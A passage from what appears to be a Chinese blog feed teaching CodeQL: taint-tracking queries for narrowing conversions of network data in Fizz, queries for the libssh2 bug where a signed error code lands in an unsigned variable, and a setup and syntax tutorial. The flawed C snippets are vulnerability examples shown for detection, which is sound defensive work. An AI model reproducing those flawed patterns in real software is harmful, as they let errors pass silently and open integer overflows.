endianness conversion.</span></span><br><span class="line"><span class="comment"> * (A telltale sign of network data.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">predicate <span class="title">isNetworkData</span><span class="params">(Instruction i)</span> </span>&#123;</span><br><span class="line">    i.(CallInstruction).<span class="built_in">getCallTarget</span>().(FunctionInstruction).<span class="built_in">getFunctionSymbol</span>() </span><br><span class="line">        instanceof EndianConvert</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，我们查找从较大类型到较小类型的所有转换，这些类型转换<strong>可能会产生溢出</strong>，而我们的目标就是为了让<strong>不受信任的数据流动至此处</strong>。</p><blockquote><p><code>ConvertInstruction</code>类型来自于<code>semmle.code.cpp.ir.IR</code>，这个类型将会查找所有的类型转换。</p><p>这里的类型转换<strong>不局限于</strong>强制类型转换和隐式类型转换，还包括<code>if</code>条件框中的<code>int</code>转<code>bool</code>类型等等。</p><p>所包含的数据量及其之多，因此需要进行二次过滤。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"></span><br><span class="line">from </span><br><span class="line">    ConvertInstruction conv, </span><br><span class="line">    Type inputType, </span><br><span class="line">    Type outputType</span><br><span class="line">where </span><br><span class="line">    <span class="comment">/* 转换后的类型位数必须小于原始类型 */</span></span><br><span class="line">    conv.<span class="built_in">getResultSize</span>() &lt; conv.<span class="built_in">getUnary</span>().<span class="built_in">getResultSize</span>() <span class="keyword">and</span></span><br><span class="line">    <span class="comment">/* 获取初始类型 */</span></span><br><span class="line">    inputType = conv.<span class="built_in">getUnary</span>().<span class="built_in">getResultType</span>() <span class="keyword">and</span> </span><br><span class="line">    <span class="comment">/* 获取转换后类型 */</span></span><br><span class="line">    outputType = conv.<span class="built_in">getResultType</span>()</span><br><span class="line">select</span><br><span class="line">    conv, </span><br><span class="line">    <span class="string">&quot;Narrowing conversion from &quot;</span> + inputType + <span class="string">&quot; to &quot;</span> + outputType + <span class="string">&quot;.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>接下来，我们便可以编写全局污点追踪查询</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Cfg</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">    <span class="built_in">Cfg</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;FizzOverflowIR&quot;</span> &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Holds if `source` is network data.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123; </span><br><span class="line">        <span class="built_in">isNetworkData</span>(source.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="comment">/** Holds if `sink` is a narrowing conversion. */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123; </span><br><span class="line">        <span class="built_in">isNarrowingConversion</span>(sink.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>将上面的代码组装起来，便是以下的完整代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @name Fizz Overflow</span></span><br><span class="line"><span class="comment"> * @description Narrowing conversions on untrusted data could enable</span></span><br><span class="line"><span class="comment"> *              an attacker to trigger an integer overflow.</span></span><br><span class="line"><span class="comment"> * @kind path-problem</span></span><br><span class="line"><span class="comment"> * @problem.severity warning</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"><span class="keyword">import</span> DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * The endianness conversion function `Endian::big()`.</span></span><br><span class="line"><span class="comment"> * It is Folly&#x27;s replacement for `ntohs` and `ntohl`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EndianConvert</span> extends Function &#123;</span><br><span class="line">    <span class="built_in">EndianConvert</span>() &#123;</span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getName</span>() = <span class="string">&quot;big&quot;</span> <span class="keyword">and</span></span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getDeclaringType</span>().<span class="built_in">getName</span>().<span class="built_in">matches</span>(<span class="string">&quot;Endian&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Holds if `i` is a narrowing conversion. */</span></span><br><span class="line">predicate <span class="built_in">isNarrowingConversion</span>(ConvertInstruction i) &#123;</span><br><span class="line">    i.<span class="built_in">getResultSize</span>() &lt; i.<span class="built_in">getUnary</span>().<span class="built_in">getResultSize</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Holds if `i` is an endianness conversion.</span></span><br><span class="line"><span class="comment"> * (A telltale sign of network data.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">predicate <span class="built_in">isNetworkData</span>(Instruction i) &#123;</span><br><span class="line">    i.(CallInstruction).<span class="built_in">getCallTarget</span>().(FunctionInstruction).<span class="built_in">getFunctionSymbol</span>() </span><br><span class="line">        instanceof EndianConvert</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> Cfg extends TaintTracking::Configuration &#123;</span><br><span class="line">    <span class="built_in">Cfg</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;FizzOverflowIR&quot;</span> &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Holds if `source` is network data.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123; </span><br><span class="line">        <span class="built_in">isNetworkData</span>(source.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="comment">/** Holds if `sink` is a narrowing conversion. */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123; </span><br><span class="line">        <span class="built_in">isNarrowingConversion</span>(sink.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from</span><br><span class="line">  Cfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink, ConvertInstruction conv,</span><br><span class="line">  Type inputType, Type outputType</span><br><span class="line">where</span><br><span class="line">  cfg.<span class="built_in">hasFlowPath</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">  conv = sink.<span class="built_in">getNode</span>().<span class="built_in">asInstruction</span>() <span class="keyword">and</span></span><br><span class="line">  inputType = conv.<span class="built_in">getUnary</span>().<span class="built_in">getResultType</span>() <span class="keyword">and</span></span><br><span class="line">  outputType = conv.<span class="built_in">getResultType</span>()</span><br><span class="line">select sink, source, sink,</span><br><span class="line">  <span class="string">&quot;Conversion of untrusted data from &quot;</span> + inputType + <span class="string">&quot; to &quot;</span> + outputType + <span class="string">&quot;.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="四、libssh2-eating-error-codes">四、libssh2_eating_error_codes</h2><h3 id="1-漏洞模式-3">1. 漏洞模式</h3><ul><li><p>这种漏洞模式主要是由类似于以下的代码组成</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> _libssh2_get_c_string(...)&#123; <span class="comment">/* ... */</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">int</span> p_len;</span><br><span class="line"><span class="keyword">if</span>((p_len = _libssh2_get_c_string(&amp;buf, &amp;p)) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="comment">//...</span></span><br></pre></td></tr></table></figure><p>其中，<code>_libssh2_get_c_string</code>函数返回的是一个<strong>带符号的整型</strong>，但接收返回值的变量是<strong>无符号</strong>的。因此该漏洞将会使函数内部<strong>产生的error code（-1）被忽略</strong>。</p></li></ul><h3 id="2-QL的编写-3">2. QL的编写</h3><ul><li><p>首先，我们不使用污点分析技术来尝试查询到这些错误。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, ReturnStmt ret</span><br><span class="line">where</span><br><span class="line">  <span class="comment">/* 返回语句的返回值限定在负数 */</span></span><br><span class="line">  ret.<span class="built_in">getExpr</span>().<span class="built_in">getValue</span>().<span class="built_in">toInt</span>() &lt; <span class="number">0</span> <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 查找一个函数调用，这个函数调用将会调用 那些可能会返回-1的函数 */</span></span><br><span class="line">  call.<span class="built_in">getTarget</span>() = ret.<span class="built_in">getEnclosingFunction</span>() <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 限定函数调用的返回值被类型转换为无符号整数 */</span></span><br><span class="line">  call.<span class="built_in">getFullyConverted</span>().<span class="built_in">getType</span>().<span class="built_in">getUnderlyingType</span>().(IntegralType).<span class="built_in">isUnsigned</span>()</span><br><span class="line">select call, ret</span><br></pre></td></tr></table></figure><p>可以查询出一部分错误点。</p></li><li><p>但上面的查询代码并不能很好的找到下面这种类型的错误</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> r = <span class="built_in">f</span>();</span><br><span class="line"><span class="type">unsigned</span> <span class="type">int</span> x = r;</span><br></pre></td></tr></table></figure><p>因此我们要试着使用一下数据流分析技术，查询从<code>FunctionCall</code>流出的数据（即返回值）到最近一个无符号类型转换的路径。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where</span><br><span class="line">  ret.<span class="built_in">getExpr</span>().<span class="built_in">getValue</span>().<span class="built_in">toInt</span>() &lt; <span class="number">0</span> <span class="keyword">and</span></span><br><span class="line">  call.<span class="built_in">getTarget</span>() = ret.<span class="built_in">getEnclosingFunction</span>() <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 数据流源头被设置为FunctionCall位置 */</span></span><br><span class="line">  source.<span class="built_in">asExpr</span>() = call <span class="keyword">and</span> </span><br><span class="line">  <span class="comment">/* 数据流终点被设置为存在类型转换的位置 */</span></span><br><span class="line">  sink.<span class="built_in">asExpr</span>().<span class="built_in">getFullyConverted</span>().<span class="built_in">getType</span>().<span class="built_in">getUnderlyingType</span>().(IntegralType).<span class="built_in">isUnsigned</span>() <span class="keyword">and</span></span><br><span class="line">  DataFlow::<span class="built_in">localFlow</span>(source, sink)</span><br><span class="line">select source, sink</span><br></pre></td></tr></table></figure></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/github/securitylab/tree/main/CodeQL_Queries/cpp&quot;&gt;github SecurityLab&lt;/a&gt; 上有多个CodeQL的使用例子&lt;/p&gt;
&lt;p&gt;通过学习这些例子，我们可以加深对CodeQL的了解，以便于更好的使用它。&lt;/p&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>CodeQL初入</title>
    <link href="https://kiprey.github.io/2020/12/CodeQL-Setup/"/>
    <id>https://kiprey.github.io/2020/12/CodeQL-Setup/</id>
    <published>2020-12-06T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.783Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>CodeQL 是一个语义代码分析引擎，它可以扫描发现代码库中的漏洞。使用 CodeQL，可以像对待数据一样查询代码。编写查询条件以查找漏洞的所有变体并处理，同时可以分享个人查询条件。</p><span id="more"></span><p>编写该文章时，主要参考了官方文档 - <a href="https://help.semmle.com/QL/ql-handbook/index.html#">QL language reference</a></p><h2 id="二、环境搭建">二、环境搭建</h2><blockquote><p>环境搭建整体参考 <a href="https://paper.seebug.org/1078/">代码分析引擎 CodeQL 初体验</a></p></blockquote><ul><li><p>首先，下载一下<code>CodeQL CLI</code>二进制文件并安装</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载codeql.zip</span></span><br><span class="line">wget https://github.com/github/codeql-cli-binaries/releases/latest/download/codeql.zip</span><br><span class="line"><span class="comment"># 解压</span></span><br><span class="line">unzip codeql.zip</span><br><span class="line"><span class="comment"># 将codeql添加至path中</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;export PATH=\$PATH:/usr/class/codeql&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br></pre></td></tr></table></figure></li><li><p>由于是入门，我们只需要使用初始工作区（starter workspace）就好，因此执行以下命令</p><blockquote><p>工作区配置参考——<a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/setting-up.html#using-the-starter-workspace">Using the starter workspace</a></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive git@github.com:github/vscode-codeql-starter.git</span><br></pre></td></tr></table></figure><blockquote><p>注意：该工作区内含了QL库，因此一定要使用递归方式来下拉工作区代码。</p><p>递归方式下拉该仓库后，我们不需要再下拉<code>https://github.com/Semmle/ql</code>这个库了。</p></blockquote><p>如果觉得下拉很慢，可以挂个代理</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 设置代理</span></span><br><span class="line">git config --global http.proxy &lt;Protocol&gt;://&lt;IP&gt;:&lt;PORT&gt;</span><br><span class="line"><span class="comment"># 取消代理</span></span><br><span class="line">git config --global --<span class="built_in">unset</span> http.proxy</span><br></pre></td></tr></table></figure></li><li><p>最后，我们还需要在VScode中下载CodeQL的插件——<a href="https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql">Visual Studio Code Marketplace</a>。</p><p>插件下载完成后，还需要在vscode中设置一下<code>Code QL -- Cli: Executable Path</code>为刚刚下载下来的<code>codeql</code>二进制文件执行路径。</p></li><li><p>上述操作完成后，我们需要先建立一个AST数据库，后续的查询操作等都是在该数据库中完成。</p><p>以C++代码为例，我们可以使用如下命令来建立一个数据库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create &lt;database-folder&gt; --language=cpp --<span class="built_in">command</span>=&lt;prefix <span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure><blockquote><p>如果省略<code>--command</code>参数，则codeQL会自动检测并使用自己的工具来构建。</p><p>但还是强烈推荐使用自己自定义的参数，尤其是大项目时。</p></blockquote><p>以构建chrome为例，由于chrome项目过于庞大，因此我们只能针对某个模块来进行分析。</p><p>于是我们可以进行如下操作</p><ul><li><p>先完整编译一个chromium，release不带符号即可。</p></li><li><p>进入obj目录，将目标模块的obj删除。</p></li><li><p>执行以下命令，重新编译该模块并构建数据库即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gn gen out/ql &amp;&amp; codeql database create &lt;targetFolder&gt; --language=cpp --Command=<span class="string">&#x27; ninja -C out/ql chrome&#x27;</span></span><br></pre></td></tr></table></figure></li></ul><p>建立好的数据库，其目录结构为</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- log\                # 输出的日志信息</span><br><span class="line">- db-cpp\             # 编译的数据库</span><br><span class="line">- src.zip             # 编译所对应的目标源码</span><br><span class="line">- codeql-database.yml # 数据库相关配置</span><br></pre></td></tr></table></figure></li><li><p>之后在VSCode中，</p><ul><li>点击“打开工作区”来打开刚刚下拉的<code>vscode-codeql-starter</code>工作区</li><li>在CodeQL插件里，打开刚刚生成的database</li><li>之后编写自己的CodeQL脚本，并将脚本保存至<code>vscode-codeql-starter\codeql-custom-queries-cpp</code>处，这样import模块时就可以正常引用。</li><li>将编写的ql脚本在VSCode中打开，之后点击CodeQL插件中的<code>Run on queue</code>，即可开始查询。</li></ul></li><li><p>如果想查看某个文件的AST，直接对目标源码，点击右键—<code>CodeQL: View AST</code>即可。第一次执行时会比较慢，稍微等待十分钟左右即可。</p></li></ul><blockquote><p>CodeQL使用操作参考 - <a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/using-extension.html">CodeQL分析项目</a></p></blockquote><h2 id="三、基本语法">三、基本语法</h2><blockquote><p>基础语法将结合ql代码来讲解。</p></blockquote><ul><li><p>该QL将输出所有基础块中的空基础块。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 首先是引入QL库中的一个包</span></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="comment">// 限定范围在所有的BlockStmt，即所有的基础块</span></span><br><span class="line">from BlockStmt b</span><br><span class="line"><span class="comment">// 获取在当前基础块中，语句个数为0的基础块（即空基础块）</span></span><br><span class="line">where b.<span class="built_in">getNumStmt</span>() = <span class="number">0</span></span><br><span class="line"><span class="comment">// 输出搜索到的空基础块，与其后面的字符串</span></span><br><span class="line">select b, <span class="string">&quot;This is an empty block.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>以下是获取某个宏定义位置的ql代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro m</span><br><span class="line">where m.<span class="built_in">getName</span>() = <span class="string">&quot;_LIBCPP_NO_CFI&quot;</span></span><br><span class="line">  <span class="keyword">or</span> m.<span class="built_in">getName</span>() = <span class="string">&quot;_GLIBC_LIKELY&quot;</span></span><br><span class="line">select m,<span class="string">&quot;macro&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>该代码获取调用特定函数的代码位置</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named memcpy&quot;</span></span><br></pre></td></tr></table></figure><p>这并不稀奇，但关键是下一个ql代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, Function func</span><br><span class="line">where</span><br><span class="line">    call.<span class="built_in">getTarget</span>() = func <span class="keyword">and</span></span><br><span class="line">    func.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select call,<span class="string">&quot;func named memcpy and called&quot;</span></span><br></pre></td></tr></table></figure><p><code>FunctionCall</code>将会涵盖所有的函数调用，因此我们可以通过该对象来获取特定函数被调用的位置。</p></li></ul><blockquote><p>对于所有的类和函数，都可以通过ctrl+右键的形式来查看其源码来了解更多信息。</p></blockquote><h2 id="四、高级语法">四、高级语法</h2><h3 id="1-谓词">1. 谓词</h3><h4 id="a-概述">a. 概述</h4><ul><li><p>在CodeQL中，函数并不叫“函数”，叫做<code>Predicates</code>（谓词）。为了便于说明，下文中笔者可能会混用<strong>函数</strong>这个词语，即下文中的 <strong>“函数”</strong> 与 <strong>“谓语”</strong> 都是指代同一个内容。</p></li><li><p>在使用谓词前，我们需要定义一个谓词。谓词的格式如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">name</span><span class="params">(type arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  statements</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>定义谓词有三个步骤</p><ul><li>关键词predicate（如果没有返回值），或者结果的类型（如果当前谓词内存在返回值）</li><li>谓词的名称</li><li>谓词的参数列表</li><li>谓词主体</li></ul></li></ul><h4 id="b-无返回值的谓词">b. 无返回值的谓词</h4><ul><li><p>无返回值的谓词以<code>predicate</code>关键词开头。若传入的值满足谓词主体中的逻辑，则该谓词将保留该值。</p></li><li><p>无返回值谓词的使用范围较小，但仍然在某些情况下扮演了很重要的一个角色，具体功能将在下文中逐渐讲解。</p></li><li><p>需要注意的是，参数<code>i</code>是一个<strong>数据集合</strong></p></li><li><p>举一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">isSmall</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  i in [<span class="number">1</span> .. <span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">from <span class="type">int</span> i </span></span><br><span class="line"><span class="function">where <span class="title">isSmall</span><span class="params">(i)</span> <span class="comment">// 将整数集合i从正无穷大的数据集含，限制至1-9</span></span></span><br><span class="line"><span class="function">select i</span></span><br><span class="line"><span class="function"><span class="comment">// 输出 1-9的数字</span></span></span><br></pre></td></tr></table></figure><p>若传入的<code>i</code>是小于10的正整数，则<code>isSmall(i)</code>将会使得传入的集合<code>i</code>只保留符合条件的值，其他值将会被舍弃。</p></li></ul><h4 id="c-带返回值的谓词">c. 带返回值的谓词</h4><ul><li><p>当我们需要将某些结果从谓词中返回时，与C/C++的return语句不同的是，谓词使用的是一个特殊变量<code>result</code>。</p></li><li><p>举个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">getSuccessor</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 若传入的i位于1-9内，则返回i+1</span></span><br><span class="line">  <span class="comment">// 注意这个语法不能用C++语法来理解</span></span><br><span class="line">  result = i + <span class="number">1</span> <span class="keyword">and</span> i in [<span class="number">1</span> .. <span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">3</span>)  <span class="comment">// 输出4</span></span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">33</span>) <span class="comment">// 不输出任何信息</span></span><br></pre></td></tr></table></figure><blockquote><p>谓词主体的语法只是为了表述逻辑之间的关系，因此务必不要用一般编程语言的语法来理解。</p></blockquote></li><li><p>在谓词主体中，<code>result</code>变量可以像一般变量一样正常使用，唯一不同的是这个变量内的数据将会被返回。</p><p>同时，<strong>谓词可能返回多个结果，或者根本不返回任何结果</strong>。以下是一个简单的例子。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;France&quot;</span>)</span><br><span class="line"><span class="comment">// 返回两个条目，&quot;Belgium&quot;与&quot;Germany&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>谓词不允许描述的数据集合个数<strong>不限于有限数量大小</strong>的。举个例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 该谓词将使得编译报错</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">multiplyBy4</span><span class="params">(<span class="type">int</span> i)</span> 